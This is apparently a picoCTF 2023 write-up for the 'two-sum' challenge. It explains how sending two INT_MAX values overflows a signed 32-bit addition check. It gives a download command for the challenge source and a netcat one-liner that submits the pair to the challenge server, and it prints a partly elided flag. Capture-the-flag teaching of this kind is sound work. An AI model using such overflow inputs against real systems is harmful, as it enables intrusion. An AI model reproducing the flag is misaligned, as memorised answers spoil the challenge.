picoCTF Solutions
picoCTF 2023Binary ExploitationMedium

two-sum

Published: April 26, 2023Updated: December 9, 2025

Description

The bank’s challenge asks for two positive integers that satisfy n1 > n1 + n2 or n2 > n1 + n2. Triggering 32-bit integer overflow is the intended exploit.

Setup

Download flag.c

Review the provided source to confirm the comparison uses signed 32-bit ints.

Connect to the service via nc saturn.picoctf.net 60781 and submit two large positive values that overflow when added.

wget https://artifacts.picoctf.net/c/456/flag.c && cat flag.c
python3 - <<'PY' print(2147483647) print(2147483647) PY | nc saturn.picoctf.net 60781

Solution

  1. Step 1Understand the constraint
    Because 32-bit signed addition wraps, adding two maximum ints produces a negative result. This satisfies the inequality check.
  2. Step 2Submit the overflow pair
    Send 2147483647 twice (or any pair that sums beyond INT_MAX). The service interprets the overflow and prints the flag.

Flag

picoCTF{Tw0_Sum_Integer_Bu773R_0v3rf...8bd}

Any pair causing signed overflow works; using INT_MAX keeps the math simple.